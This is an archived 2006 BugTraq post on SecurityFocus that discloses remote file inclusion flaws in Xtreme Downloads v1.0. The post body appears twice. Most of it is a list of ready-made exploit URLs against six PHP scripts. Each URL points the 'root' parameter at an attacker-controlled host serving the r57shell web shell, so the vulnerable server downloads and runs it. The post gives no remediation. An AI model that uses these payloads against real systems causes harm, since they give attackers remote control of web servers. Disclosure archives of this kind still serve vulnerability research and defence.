BugTraq
Back to list
|
Post reply
Multiple file include exploits in Xtreme Downloads v.1.0
Jun 05 2006 09:10PM
black code (black-cod3 hotmail com)
Multiple file include exploits in Xtreme Downloads v.1.0
script type : Xtreme Downloads v.1.0
bug found by : sweet-devil & black-code
team : site-down
type : file include
####################################################
exploits :
download.php
http://www.example.com/path/download.php?root=http://yoursite/r57shell.t
xt?
manager.php
http://www.example.com/path/manager.php?root=http://yoursite/r57shell.tx
t?
/admin/scripts/category.php?
http://www.example.com/path/admin/scripts/category.php?root=http://yours
ite/r57shell.txt?
/includes/add_allow.php?
http://www.example.com/path/includes/add_allow.php?root=http://yoursite/
r57shell.txt?
/admin/index.php
http://www.example.com/path/admin/index.php?root=http://yoursite/r57shel
l.txt?
/admin/login.php
http://www.example.com/path/admin/admin/login.php?root=http://yoursite/r
57shell.txt?
####################################################
#######################
emails:
gamr-14 (at) hotmail (dot) com [email concealed] & black-cod3 (at) hotmail (dot) com [email concealed]
#######################
All my respect to our friends , lezr.com , g123g.net
done .. peace
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
script type : Xtreme Downloads v.1.0
bug found by : sweet-devil & black-code
team : site-down
type : file include
####################################################
exploits :
download.php
http://www.example.com/path/download.php?root=http://yoursite/r57shell.t
xt?
manager.php
http://www.example.com/path/manager.php?root=http://yoursite/r57shell.tx
t?
/admin/scripts/category.php?
http://www.example.com/path/admin/scripts/category.php?root=http://yours
ite/r57shell.txt?
/includes/add_allow.php?
http://www.example.com/path/includes/add_allow.php?root=http://yoursite/
r57shell.txt?
/admin/index.php
http://www.example.com/path/admin/index.php?root=http://yoursite/r57shel
l.txt?
/admin/login.php
http://www.example.com/path/admin/admin/login.php?root=http://yoursite/r
57shell.txt?
####################################################
#######################
emails:
gamr-14 (at) hotmail (dot) com [email concealed] & black-cod3 (at) hotmail (dot) com [email concealed]
#######################
All my respect to our friends , lezr.com , g123g.net
done .. peace
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
[ reply ]